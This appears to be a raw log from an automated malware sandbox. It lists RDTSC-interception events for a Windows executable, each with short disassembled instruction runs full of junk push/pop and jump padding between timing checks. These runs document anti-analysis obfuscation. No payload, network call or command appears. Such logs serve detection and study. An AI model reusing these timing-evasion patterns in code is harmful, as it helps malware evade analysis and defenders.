Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DA273B second address: DA2756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnl 00007F0D5D4BD016h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F0D5D4BD016h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DA2756 second address: DA2763 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D5D345976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DA2763 second address: DA2773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D5D4BD01Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DA2773 second address: DA2778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DA28FD second address: DA2902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DA2902 second address: DA2907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DA2907 second address: DA290D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DB0EDA second address: DB0EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DAF243 second address: DAF254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F0D5D4BD016h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DAF254 second address: DAF258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DAF258 second address: DAF25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DAF25E second address: DAF275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F0D5D34597Ch 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DC483F second address: DC485C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D5D4BD023h 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DC485C second address: DC4873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D5D34597Bh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DC4873 second address: DC48C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F0D5D4BD022h 0x0000000f jmp 00007F0D5D4BD024h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F0D5D4BD020h 0x0000001b popad 0x0000001c push edi 0x0000001d jnl 00007F0D5D4BD016h 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDDB34 second address: DDDB5A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D5D345976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007F0D5D345976h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F0D5D34597Fh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDCA46 second address: DDCA77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0D5D4BD016h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jnc 00007F0D5D4BD016h 0x00000013 jmp 00007F0D5D4BD027h 0x00000018 pop eax 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDCE4B second address: DDCE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDD27F second address: DDD292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDD292 second address: DDD298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDD298 second address: DDD29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDD6BD second address: DDD6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDD82D second address: DDD84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F0D5D4BD026h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDD84B second address: DDD861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F0D5D345976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jg 00007F0D5D345976h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDD861 second address: DDD865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDD865 second address: DDD895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F0D5D34597Fh 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F0D5D345976h 0x00000016 popad 0x00000017 popad 0x00000018 jc 00007F0D5D3459A9h 0x0000001e js 00007F0D5D34597Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDD895 second address: DDD8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0D5D4BD027h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DDD8B6 second address: DDD8BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DE1E23 second address: DE1E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DE1E27 second address: DE1E75 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push esi 0x00000009 jnp 00007F0D5D34597Ch 0x0000000f pop esi 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F0D5D345987h 0x00000019 mov eax, dword ptr [eax] 0x0000001b jbe 00007F0D5D345990h 0x00000021 pushad 0x00000022 jmp 00007F0D5D345982h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DE1E75 second address: DE1E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0D5D4BD01Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DE1E8C second address: DE1E91 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DE213A second address: DE213F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DE213F second address: DE2154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F0D5D345976h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DE2154 second address: DE21C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F0D5D4BD018h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 add edx, 3A3ACA00h 0x0000002a sub dword ptr [ebp+122D18AAh], esi 0x00000030 push dword ptr [ebp+122D1E99h] 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F0D5D4BD018h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 push esi 0x00000051 push ebx 0x00000052 pop edx 0x00000053 pop edx 0x00000054 call 00007F0D5D4BD019h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e pop eax 0x0000005f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DE21C8 second address: DE21CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DE21CE second address: DE21D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0D5D4BD016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B0F00 second address: 53B0F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B0F06 second address: 53B0F0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0D97 second address: 53A0DD1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 6BE70061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F0D5D345987h 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0D5D345985h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0DD1 second address: 53A0DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0D5D4BD01Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0DF7 second address: 53A0DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0DFD second address: 53A0E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0E01 second address: 53A0E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F0552 second address: 53F0567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F0567 second address: 53F0577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D34597Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F0577 second address: 53F057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F057B second address: 53F05A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F0D5D34597Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0D5D34597Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F05A1 second address: 53F05B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F05B0 second address: 53F05C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D345984h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F05C8 second address: 53F05CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53801BE second address: 5380210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D5D345981h 0x00000009 and eax, 7C858A16h 0x0000000f jmp 00007F0D5D345981h 0x00000014 popfd 0x00000015 jmp 00007F0D5D345980h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push dword ptr [ebp+08h] 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F0D5D34597Ch 0x00000028 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0AFF second address: 53A0B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D4BD01Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0B0F second address: 53A0B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0B13 second address: 53A0B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0D5D4BD01Dh 0x00000010 sbb cl, 00000036h 0x00000013 jmp 00007F0D5D4BD021h 0x00000018 popfd 0x00000019 mov bx, ax 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 mov dl, cl 0x00000022 mov dx, F758h 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0D5D4BD029h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0B6C second address: 53A0B81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A05EF second address: 53A05F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A05F5 second address: 53A05F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A05F9 second address: 53A0618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, 64F39444h 0x00000011 jmp 00007F0D5D4BD01Dh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0618 second address: 53A065D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov di, DF5Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F0D5D34597Bh 0x00000017 add ax, DC0Eh 0x0000001c jmp 00007F0D5D345989h 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A065D second address: 53A0661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0661 second address: 53A0665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0665 second address: 53A066B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0514 second address: 53A054C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0D5D345983h 0x0000000a and si, AF1Eh 0x0000000f jmp 00007F0D5D345989h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A054C second address: 53A0552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0552 second address: 53A05B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345983h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F0D5D345986h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov dl, 0Dh 0x00000018 pushfd 0x00000019 jmp 00007F0D5D345986h 0x0000001e and ecx, 7B1761D8h 0x00000024 jmp 00007F0D5D34597Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A01EC second address: 53A01F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A01F2 second address: 53A01F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A01F6 second address: 53A01FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A01FA second address: 53A0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov si, 926Dh 0x0000000e popad 0x0000000f mov dword ptr [esp], ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0D5D345986h 0x00000019 add si, 7338h 0x0000001e jmp 00007F0D5D34597Bh 0x00000023 popfd 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53A0238 second address: 53A0280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 3E99898Bh 0x00000009 popad 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007F0D5D4BD01Eh 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0D5D4BD028h 0x0000001c sbb ch, FFFFFFF8h 0x0000001f jmp 00007F0D5D4BD01Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B009F second address: 53B00E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0D5D34597Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007F0D5D34597Ch 0x00000018 pop esi 0x00000019 mov edx, 7237D856h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B00E2 second address: 53B00F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D4BD023h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B00F9 second address: 53B0153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 call 00007F0D5D345988h 0x00000015 pop edx 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0D5D345986h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B0153 second address: 53B0157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B0157 second address: 53B015D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B015D second address: 53B01D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1CE91303h 0x00000008 pushfd 0x00000009 jmp 00007F0D5D4BD028h 0x0000000e add ax, D0C8h 0x00000013 jmp 00007F0D5D4BD01Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ax, bx 0x00000023 pushfd 0x00000024 jmp 00007F0D5D4BD027h 0x00000029 and ax, A7BEh 0x0000002e jmp 00007F0D5D4BD029h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B01D1 second address: 53B01E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D34597Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53B01E1 second address: 53B01E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F04BD second address: 53F04C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: 53F04C3 second address: 53F04D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, bh 0x0000000e mov si, D967h 0x00000012 popad 0x00000013 rdtsc
